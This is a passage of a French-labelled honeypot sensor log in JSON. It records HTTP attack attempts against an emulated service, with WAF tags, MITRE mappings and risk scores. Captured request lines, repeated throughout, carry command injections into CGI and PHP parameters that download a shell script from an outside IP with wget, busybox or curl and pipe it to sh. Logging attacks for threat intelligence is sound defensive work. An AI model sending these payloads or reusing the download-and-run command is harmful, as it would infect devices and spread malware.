\u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\\r\\nHo\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002287a338ce0acad6dc8a9c27df06009c0c6ebc2321\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20al\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20al\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":298},{"id":11809684,"ip":"45.153.34.252","ts":"2026-07-14 02:29:40.000000","proto":"tcp","src_port":38160,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/diagnostic.php","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00220b165bcd0084116a55970e964cd92616df411a98\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 378, \u0022payload_entropy\u0022: 5.231474697395679, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00223dec54a4bb053b3c6b0a6c0531fa483bf4729cb9\u0022, \u0022event_fingerprint\u0022: \u0022a7e1d461678b775495a2c4fdaabb032f690935a4\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022be0e3b9a4cbe8793231a02764902b0d9\u0022, \u0022path_pattern_hash\u0022: \u0022918c7cd9de3921c3a9cf2fd44c04b514\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Le\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/diagnostic.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Length: 218\\r\\nConnection: close\\r\\n\\r\\nact=ping\u0026dst=%26%20cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusy\u0022, \u0022payload_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Le\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/diagnostic.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Length: 218\\r\\nConnection: close\\r\\n\\r\\nact=ping\u0026dst=%26%20cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusy\u0022, \u0022payload_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Le\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002221783be94bcbae9f8e55f374578e2288f8ef55b3\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/diagnostic.php\u0022, \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Le\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/diagnostic.php\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/diagnostic.php\u0022, \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/diagnostic.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Le\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":378},{"id":11809682,"ip":"45.153.34.252","ts":"2026-07-14 02:29:39.000000","proto":"tcp","src_port":38148,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":0,"waf_tags":"[]","http_method":"POST","http_target":"\/login.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00225d1c064d8f41c9821d75c9116650ed5db6a1a5ee\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 138, \u0022payload_entropy\u0022: 4.993382020862541, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 8.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.1, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 46, \u0022tag_count\u0022: 5, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00226088ad6471fb36962cbc880bc9ad9244373842bf\u0022, \u0022event_fingerprint\u0022: \u002259c921826918c9e8d332b1a86d3c97ce766b5bd8\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022confidence\u0022: 0.97, \u0022classification_confidence\u0022: 0.97, \u0022precision_score\u0022: 97, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 46}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 97.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, 